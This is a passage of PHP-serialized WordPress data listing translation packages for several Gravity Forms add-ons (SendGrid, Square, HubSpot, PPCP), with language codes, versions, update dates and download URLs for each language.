(China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformssendgrid/gravityformssendgrid-zh_CN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2022-06-23T19:13:23+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformssendgrid/gravityformssendgrid-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2020-11-06T09:05:56+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformssendgrid/gravityformssendgrid-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"nl-be\";a:7:{s:8:\"language\";s:5:\"nl_BE\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2022-06-29T15:47:02+00:00\";s:12:\"english_name\";s:15:\"Dutch (Belgium)\";s:11:\"native_name\";s:20:\"Nederlands (België)\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformssendgrid/gravityformssendgrid-nl_BE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2022-06-27T09:11:37+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformssendgrid/gravityformssendgrid-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2022-03-15T13:30:44+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformssendgrid/gravityformssendgrid-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2022-06-23T19:13:43+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:100:\"https://packages.translationspress.com/rocketgenius/gravityformssendgrid/gravityformssendgrid-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2020-10-21T13:18:39+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformssendgrid/gravityformssendgrid-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2020-11-06T09:06:48+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformssendgrid/gravityformssendgrid-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:9:\"de/formal\";a:7:{s:8:\"language\";s:12:\"de_DE_formal\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2023-01-26T16:08:21+00:00\";s:12:\"english_name\";s:15:\"German (Formal)\";s:11:\"native_name\";s:13:\"Deutsch (Sie)\";s:7:\"package\";s:110:\"https://packages.translationspress.com/rocketgenius/gravityformssendgrid/gravityformssendgrid-de_DE_formal.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2020-07-04T20:05:08+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformssendgrid/gravityformssendgrid-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2020-06-28T10:45:00+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformssendgrid/gravityformssendgrid-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2020-05-23T18:18:20+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformssendgrid/gravityformssendgrid-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2020-11-06T09:07:21+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:100:\"https://packages.translationspress.com/rocketgenius/gravityformssendgrid/gravityformssendgrid-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2021-09-14T09:57:06+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformssendgrid/gravityformssendgrid-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2020-12-17T14:33:12+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformssendgrid/gravityformssendgrid-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2020-12-17T14:32:57+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformssendgrid/gravityformssendgrid-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2020-11-06T09:06:16+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformssendgrid/gravityformssendgrid-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2020-11-04T22:55:46+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformssendgrid/gravityformssendgrid-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2020-11-06T09:05:23+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformssendgrid/gravityformssendgrid-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"1.5.1\";s:7:\"updated\";s:25:\"2020-05-15T07:53:36+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:103:\"https://packages.translationspress.com/rocketgenius/gravityformssendgrid/gravityformssendgrid-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:18:\"gravityformssquare\";a:1:{s:12:\"translations\";a:16:{s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"1.8.1\";s:7:\"updated\";s:25:\"2023-03-05T09:58:32+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssquare/gravityformssquare-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"1.8.1\";s:7:\"updated\";s:25:\"2022-06-27T09:13:12+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssquare/gravityformssquare-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"1.8.1\";s:7:\"updated\";s:25:\"2022-06-27T09:13:16+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssquare/gravityformssquare-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"1.8.1\";s:7:\"updated\";s:25:\"2022-07-15T09:36:00+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssquare/gravityformssquare-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"1.8.1\";s:7:\"updated\";s:25:\"2022-07-13T19:50:31+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssquare/gravityformssquare-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"1.8.1\";s:7:\"updated\";s:25:\"2022-06-27T09:13:37+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssquare/gravityformssquare-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"1.8.1\";s:7:\"updated\";s:25:\"2023-01-06T17:40:20+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssquare/gravityformssquare-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"1.8.1\";s:7:\"updated\";s:25:\"2022-07-01T14:23:05+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssquare/gravityformssquare-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"1.8.1\";s:7:\"updated\";s:25:\"2023-01-06T17:40:27+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:96:\"https://packages.translationspress.com/rocketgenius/gravityformssquare/gravityformssquare-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"1.8.1\";s:7:\"updated\";s:25:\"2021-10-02T10:47:45+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssquare/gravityformssquare-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"1.8.1\";s:7:\"updated\";s:25:\"2023-01-06T17:40:40+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssquare/gravityformssquare-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"1.8.1\";s:7:\"updated\";s:25:\"2022-06-29T23:32:24+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssquare/gravityformssquare-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"1.8.1\";s:7:\"updated\";s:25:\"2022-10-08T16:03:35+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssquare/gravityformssquare-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"1.8.1\";s:7:\"updated\";s:25:\"2023-01-06T17:40:08+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssquare/gravityformssquare-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"1.8.1\";s:7:\"updated\";s:25:\"2022-07-16T20:22:58+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssquare/gravityformssquare-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"1.8.1\";s:7:\"updated\";s:25:\"2023-01-06T17:40:51+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssquare/gravityformssquare-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:19:\"gravityformshubspot\";a:1:{s:12:\"translations\";a:15:{s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"1.5.4\";s:7:\"updated\";s:25:\"2021-10-11T17:39:56+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshubspot/gravityformshubspot-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"1.5.4\";s:7:\"updated\";s:25:\"2022-06-27T09:00:32+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshubspot/gravityformshubspot-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"1.5.4\";s:7:\"updated\";s:25:\"2021-10-25T16:29:18+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshubspot/gravityformshubspot-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"1.5.4\";s:7:\"updated\";s:25:\"2023-01-06T17:41:06+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshubspot/gravityformshubspot-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"1.5.4\";s:7:\"updated\";s:25:\"2023-01-06T17:41:22+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshubspot/gravityformshubspot-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"1.5.4\";s:7:\"updated\";s:25:\"2023-01-06T17:41:24+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshubspot/gravityformshubspot-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"1.5.4\";s:7:\"updated\";s:25:\"2021-11-01T19:35:24+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshubspot/gravityformshubspot-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"1.5.4\";s:7:\"updated\";s:25:\"2023-03-14T17:51:45+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:98:\"https://packages.translationspress.com/rocketgenius/gravityformshubspot/gravityformshubspot-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"1.5.4\";s:7:\"updated\";s:25:\"2023-01-06T17:41:41+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshubspot/gravityformshubspot-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"1.5.4\";s:7:\"updated\";s:25:\"2021-10-08T19:13:59+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshubspot/gravityformshubspot-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"1.5.4\";s:7:\"updated\";s:25:\"2021-10-25T23:12:13+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshubspot/gravityformshubspot-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"1.5.4\";s:7:\"updated\";s:25:\"2023-01-06T17:41:48+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshubspot/gravityformshubspot-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"1.5.4\";s:7:\"updated\";s:25:\"2021-10-27T18:34:53+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshubspot/gravityformshubspot-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"1.5.4\";s:7:\"updated\";s:25:\"2023-01-06T17:41:52+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshubspot/gravityformshubspot-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"1.5.4\";s:7:\"updated\";s:25:\"2023-01-06T17:41:55+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformshubspot/gravityformshubspot-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:16:\"gravityformsppcp\";a:1:{s:12:\"translations\";a:16:{s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"2.4.2\";s:7:\"updated\";s:25:\"2023-03-05T09:56:44+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsppcp/gravityformsppcp-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"2.4.2\";s:7:\"updated\";s:25:\"2022-06-27T09:04:10+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsppcp/gravityformsppcp-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"2.4.2\";s:7:\"updated\";s:25:\"2022-06-27T10:03:57+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsppcp/gravityformsppcp-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"2.4.2\";s:7:\"updated\";s:25:\"2022-07-15T09:35:34+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsppcp/gravityformsppcp-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"2.4.2\";s:7:\"updated\";s:25:\"2022-07-13T19:50:13+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsppcp/gravityformsppcp-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"2.4.2\";s:7:\"updated\";s:25:\"2022-06-27T09:04:37+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsppcp/gravityformsppcp-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"2.4.2\";s:7:\"updated\";s:25:\"2023-03-05T09:35:02+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsppcp/gravityformsppcp-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"2.4.2\";s:7:\"updated\";s:25:\"2023-03-14T13:29:40+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsppcp/gravityformsppcp-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"2.4.2\";s:7:\"updated\";s:25:\"2023-03-23T05:06:37+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:92:\"https://packages.translationspress.com/rocketgenius/gravityformsppcp/gravityformsppcp-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"2.4.2\";s:7:\"updated\";s:25:\"2022-06-27T09:05:13+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6